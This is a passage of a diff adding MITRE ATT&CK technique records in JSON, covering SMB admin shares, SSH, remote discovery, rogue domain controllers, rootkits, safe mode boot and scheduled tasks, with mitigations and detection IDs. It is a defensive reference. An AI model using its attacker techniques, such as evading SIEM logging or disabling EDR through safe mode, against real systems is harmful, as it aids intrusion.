+                        "Matthew Demaske, Adaptforward"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:33.524000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1026: Privileged Account Management",
+                            "M1028: Operating System Configuration",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0327: Multi-event Detection Strategy for RDP-Based Remote Logins and Post-Access Activity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:25:28.212000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "SMB/Windows Admin Shares",
+                    "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1021/002",
+                            "external_id": "T1021.002"
+                        },
+                        {
+                            "source_name": "Medium Detecting WMI Persistence",
+                            "description": "French, D. (2018, October 9). Detecting & Removing an Attacker\u2019s WMI Persistence. Retrieved October 11, 2019.",
+                            "url": "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96"
+                        },
+                        {
+                            "source_name": "TechNet RPC",
+                            "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx"
+                        },
+                        {
+                            "source_name": "Microsoft Admin Shares",
+                            "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.",
+                            "url": "http://support.microsoft.com/kb/314984"
+                        },
+                        {
+                            "source_name": "Windows Event Forwarding Payne",
+                            "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.",
+                            "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem"
+                        },
+                        {
+                            "source_name": "Lateral Movement Payne",
+                            "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.",
+                            "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts"
+                        },
+                        {
+                            "source_name": "Wikipedia Server Message Block",
+                            "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.",
+                            "url": "https://en.wikipedia.org/wiki/Server_Message_Block"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2025-10-24 17:48:45.700000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1035: Limit Access to Resource Over Network",
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0530: Multi-Event Detection for SMB Admin Share Lateral Movement"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:27:15.774000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "SSH",
+                    "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. On ESXi, SSH can be enabled either directly on the host (e.g., via `vim-cmd hostsvc/enable_ssh`) or via vCenter.(Citation: Sygnia ESXi Ransomware 2025)(Citation: TrendMicro ESXI Ransomware)(Citation: Sygnia Abyss Locker 2025) The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user\u2019s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user (i.e., [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1021/004",
+                            "external_id": "T1021.004"
+                        },
+                        {
+                            "source_name": "Sygnia Abyss Locker 2025",
+                            "description": "Abigail See, Zhongyuan (Aaron) Hau, Ren Jie Yow, Yoav Mazor, Omer Kidron, and Oren Biderman. (2025, February 4). The Anatomy of Abyss Locker Ransomware Attack. Retrieved April 4, 2025.",
+                            "url": "https://www.sygnia.co/blog/abyss-locker-ransomware-attack-analysis/"
+                        },
+                        {
+                            "source_name": "TrendMicro ESXI Ransomware",
+                            "description": "Junestherry Dela Cruz. (2022, January 24). Analysis and Impact of LockBit Ransomware\u2019s First Linux and VMware ESXi Variant. Retrieved March 26, 2025.",
+                            "url": "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html"
+                        },
+                        {
+                            "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing",
+                            "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.",
+                            "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"
+                        },
+                        {
+                            "source_name": "Sygnia ESXi Ransomware 2025",
+                            "description": "Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.",
+                            "url": "https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Janantha Marasinghe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:34.985000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1032: Multi-factor Authentication",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0596: Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:28.187000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Remote System Discovery",
+                    "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  \n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1018",
+                            "external_id": "T1018"
+                        },
+                        {
+                            "source_name": "CISA AR21-126A FIVEHANDS May 2021",
+                            "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.",
+                            "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"
+                        },
+                        {
+                            "source_name": "Elastic - Koadiac Detection with EQL",
+                            "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 17, 2024.",
+                            "url": "https://www.elastic.co/security-labs/embracing-offensive-tooling-building-detections-against-koadic-using-eql"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daniel Stepanic, Elastic",
+                        "RedHuntLabs, @redhuntlabs",
+                        "Austin Clark, @c2defense"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.6",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:31.319000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.6",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0574: Detection Strategy for Remote System Enumeration Behavior"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Rogue Domain Controller",
+                    "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1207",
+                            "external_id": "T1207"
+                        },
+                        {
+                            "source_name": "DCShadow Blog",
+                            "description": "Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.",
+                            "url": "https://www.dcshadow.com/"
+                        },
+                        {
+                            "source_name": "Adsecurity Mimikatz Guide",
+                            "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.",
+                            "url": "https://adsecurity.org/?page_id=1821"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vincent Le Toux"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-16 20:07:52.911000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0276: Detection Strategy for Rogue Domain Controller (DCShadow) Registration and Replication Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:26.496000+00:00",
+                    "modified": "2026-05-12 15:12:00.620000+00:00",
+                    "name": "Rootkit",
+                    "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)\n\nRootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1014",
+                            "external_id": "T1014"
+                        },
+                        {
+                            "source_name": "CrowdStrike Linux Rootkit",
+                            "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.",
+                            "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"
+                        },
+                        {
+                            "source_name": "BlackHat Mac OSX Rootkit",
+                            "description": "Pan, M., Tsai, S. (2014). You can\u2019t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.",
+                            "url": "http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf"
+                        },
+                        {
+                            "source_name": "Symantec Windows Rootkits",
+                            "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.",
+                            "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf"
+                        },
+                        {
+                            "source_name": "Wikipedia Rootkit",
+                            "description": "Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.",
+                            "url": "https://en.wikipedia.org/wiki/Rootkit"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.620000+00:00\", \"old_value\": \"2026-04-15 22:32:28.874000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0377: Detection of Kernel/User-Level Rootkit Behavior Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c7660f19-f8c5-4ae3-a5e5-24381c270376",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-14 22:53:27.979000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Safe Mode Boot",
+                    "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Windows Startup Settings)(Citation: Sophos Safe Mode Boot)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason safe mode boot)(Citation: BleepingComputer REvil 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1688",
+                            "external_id": "T1688"
+                        },
+                        {
+                            "source_name": "BleepingComputer REvil 2021",
+                            "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.",
+                            "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/"
+                        },
+                        {
+                            "source_name": "Sophos Safe Mode Boot",
+                            "description": "Andrew Brandt. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved April 15, 2026.",
+                            "url": "https://www.sophos.com/en-us/blog/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection"
+                        },
+                        {
+                            "source_name": "Cybereason safe mode boot",
+                            "description": "Cybereason Nocturnus. (n.d.). Cybereason vs. MedusaLocker Ransomware. Retrieved April 15, 2026.",
+                            "url": "https://www.cybereason.com/blog/research/medusalocker-ransomware"
+                        },
+                        {
+                            "source_name": "Microsoft Windows Startup Settings",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://support.microsoft.com/en-us/windows/windows-startup-settings-1af6ec8c-4d4a-4b23-adb7-e76eef0b847f"
+                        },
+                        {
+                            "source_name": "Microsoft bcdedit",
+                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
+                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit"
+                        },
+                        {
+                            "source_name": "CyberArk Labs Safe Mode 2016",
+                            "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.",
+                            "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jorell Magtibay, National Australia Bank Limited",
+                        "Kiyohito Yamamoto, RedLark, NTT Communications",
+                        "Yusuke Kubo, RedLark, NTT Communications"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2026-04-22 15:48:52.409000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1054: Software Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0116: Detection Strategy for Safe Mode Boot Abuse"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:46.977000+00:00",
+                    "modified": "2026-05-12 15:12:00.626000+00:00",
+                    "name": "Scheduled Task/Job",
+                    "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1053",
+                            "external_id": "T1053"
+                        },
+                        {
+                            "source_name": "ProofPoint Serpent",
+                            "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
+                        },
+                        {
+                            "source_name": "TechNet Task Scheduler Security",
+                            "description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/cc785125.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Prashant Verma, Paladion",
+                        "Leo Loobeek, @leoloobeek",
+                        "Travis Smith, Tripwire",
+                        "Alain Homewood, Insomnia Security",
+                        "Andrew Northern, @ex_raritas",
+                        "Bryan Campbell, @bry_campbell",
+                        "Zachary Abzug, @ZackDoesML",
+                        "Selena Larson, @selenalarson"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.5",
